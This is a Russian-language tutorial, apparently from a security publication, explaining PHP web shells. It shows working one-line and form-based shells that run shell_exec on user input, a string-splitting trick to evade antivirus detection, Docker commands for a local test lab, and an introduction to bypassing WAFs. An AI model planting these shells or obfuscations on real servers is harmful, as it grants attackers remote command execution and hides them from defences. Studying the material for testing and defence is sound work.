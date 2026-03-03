Содержание статьи
Статья имеет ознакомительный характер и предназначена для специалистов по безопасности, проводящих тестирование в рамках контракта. Автор и редакция не несут ответственности за любой вред, причиненный с применением изложенной информации. Распространение вредоносных программ, нарушение работы систем и нарушение тайны переписки преследуются по закону.
Веб‑шелл (web-sell, веб‑оболочка) — инструмент для комфортного удаленного выполнения кода на сервере. Обычно это скрипт, который работает как обычное веб‑приложение. Задача скрипта — выполнить в системе отправленную пользователем команду и вернуть результат. Скрипт пишется на языке, который установлен на конкретном веб‑сервере.
Чаще всего это скрипт на PHP, так как PHP — самый распространенный на вебе серверный язык программирования. Но веб‑шелл может быть написан и на любом другом языке: Python, JavaScript (Node.js), Java, Go и прочих. Конкретная платформа зависит от того, как сконфигурирован сервер и какие интерпретаторы установлены.
Читая статьи про веб‑шеллы, ты чаще всего встретишь формулировку «вредоносная программа». На самом деле веб‑шеллами пользуются и для администрирования серверов, чтобы не коннектиться все время по SSH или RDP. Вредоносность появляется только в том случае, когда веб‑шелл загружен на сервер несанкционированно и используется хакером для захвата контроля.
Простейший пример веб‑шелла на PHP:
<pre> <?php echo shell_exec($_GET['cmd']); ?></pre>
Скрипт получает GET-параметр
cmd и передает на выполнение функции
shell_exec(. Функция
shell_exec( сообщает веб‑серверу, что нужно выполнить определенный код в операционной системе. Результат выполнения возвращается на веб‑страницу. Обертка
<
pre>...
/ нужна, чтобы вывод был читаемым, а не сваленными в кучу символами.
Давай на практическом примере посмотрим, как это работает. Для этого сохрани пример веб‑шелла в файл
shell. и запусти Docker-контейнер, примонтировав папку. Выполни команду
docker run --rm -p 8080:80 -v $(pwd):/var/www/html php:8.2-apache
В Windows PowerShell могут потребоваться кавычки:
docker run --rm -p 8080:80 -v "${PWD}:/var/www/html" php:8.2-apache
После запуска контейнера открой в браузере такой URL:
http://
На странице увидишь классическую работу
ls .
Попробуй вместо
ls команды вроде
whoami,
id,
uname или любые другие команды операционной системы.
В Windows могут возникнуть проблемы с запуском. Штатный защитник, видя в файле
shell_exec( или
system(, классифицирует файл как вредоносный и удаляет его. Банальная обфускация решит проблему:
<pre> <?php $f = "shel"."l_"."exec"; echo $f($_GET['cmd']); ?></pre>
GET-параметры — неплохой вариант для начала, но не самый удобный. Для комфортной работы попробуй альтернативу со строкой ввода и POST-запросом:
<form method="POST"> <input type="text" name="cmd" placeholder="Enter command"> <button type="submit">Execute</button></form><pre><?php$f = "shel"."l_"."exec";echo $f($_POST['cmd']);?></pre>
Сохрани файл как
shell2. и протестируй http://localhost:8080/shell2.php. Теперь ты можешь комфортно отправлять любые команды и не париться по поводу того, что забыл где‑то исправить пробел на
%20.
Обход защиты
Плюс веб‑шелла в том, что он выполняется в контексте веб‑приложения. Тебе не нужно создавать отдельный коннект, а значит, отпадает необходимость обхода файрвола. Но файрвол — это только один из способов защиты.
В Docker наш проект полностью открыт атакам. В реальной жизни на сервере может быть установлен Web Application Firewall (WAF), настроенный на блокировку запросов, содержащих системные команды. В таких случаях атакующему приходится придумывать способ обфускации (то есть скрытия), который позволит обойти WAF. Поскольку тот чаще всего работает по определенным правилам, это вполне возможно.
